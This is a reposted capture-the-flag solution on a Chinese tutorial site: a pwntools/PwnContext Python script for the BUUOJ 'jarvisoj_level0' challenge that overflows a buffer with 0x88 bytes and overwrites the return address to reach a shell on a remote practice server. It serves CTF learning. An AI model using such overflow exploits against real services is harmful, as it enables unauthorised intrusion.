C/C++教程
CTF-Buuoj-Pwn-jarvisoj_level0
本文主要是介绍CTF-Buuoj-Pwn-jarvisoj_level0,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
#-----------------------------------------------------------------------------------------------
# coding:UTF-8 |
# author:zxcyyyyy000 |
# :) |
#-----------------------------------------------------------------------------------------------
from PwnContext import *
from pwnlib.util.packing import p32
from pwnlib.util.packing import p64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u64
#-----------------------------------------------------------------------------------------------
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=False :ctx.recvuntil(delims, drop)
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
irt = lambda :ctx.interactive()
p = lambda :pause()
#-----------------------------------------------------------------------------------------------
Debug = 0
file_name = 'level0'
target_addr = 'node4.buuoj.cn:29259'
libc_name = ''
libc_path = '/home/ubuntu/Tools/libc-database/libs/' + libc_name + '/'
context.log_level = 'DEBUG'
ctx.binary = file_name
if Debug == 0:
elf = ELF(file_name)
if(libc_name != ''):
libc = ELF(libc_path+'libc.so.6')
context.os = elf.os
context.arch = elf.arch
ctx.remote=(str((target_addr.split(':'))[0]),int((target_addr.split(':'))[1]))
ctx.start('remote')
elif Debug == 1:
ctx.custom_lib_dir = libc_path
ctx.debug_remote_libc = True
elf = ELF(file_name)
libc = ELF(libc_path+'libc.so.6')
context.os = elf.os
context.arch = elf.arch
ctx.start()
elif Debug == 2:
elf = ELF(file_name)
ctx.start()
else:
print("Error")
exit(1)
#-----------------------------------------------------------------------------------------------
def Exploit():
sl(0x88*'a'+p64(0x0000000000400596))
irt()
#-----------------------------------------------------------------------------------------------
Exploit()
这篇关于CTF-Buuoj-Pwn-jarvisoj_level0的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享11-22
-
ansible 的archive 参数是什么意思?-icode9专业技术文章分享11-22
-
ansible 中怎么只用archive 排除某个目录?-icode9专业技术文章分享11-22
-
exclude_path参数是什么作用?-icode9专业技术文章分享11-22
-
微信开放平台第三方平台什么时候调用数据预拉取和数据周期性更新接口?-icode9专业技术文章分享11-22
-
uniapp 实现聊天消息会话的列表功能怎么实现?-icode9专业技术文章分享11-22
-
在Mac系统上将图片中的文字提取出来有哪些方法?-icode9专业技术文章分享11-22
-
excel 表格中怎么固定一行显示不滚动?-icode9专业技术文章分享11-22
-
怎么将 -rwxr-xr-x 修改为 drwxr-xr-x?-icode9专业技术文章分享11-22
-
在Excel中怎么将小数向上取整到最接近的整数?-icode9专业技术文章分享11-22
-
Excel中常见的取整函数有哪些?-icode9专业技术文章分享11-22
-
错误信息:does not match the actual quantity supplied 提示是什么意思?-icode9专业技术文章分享11-22
-
WebSocket学习:初学者的简单指南11-21
-
获取apk的md5值有哪些方法?-icode9专业技术文章分享11-20
-
xml报文没有传 IdentCode ,为什么正常解析没报错呢?-icode9专业技术文章分享11-20
栏目导航
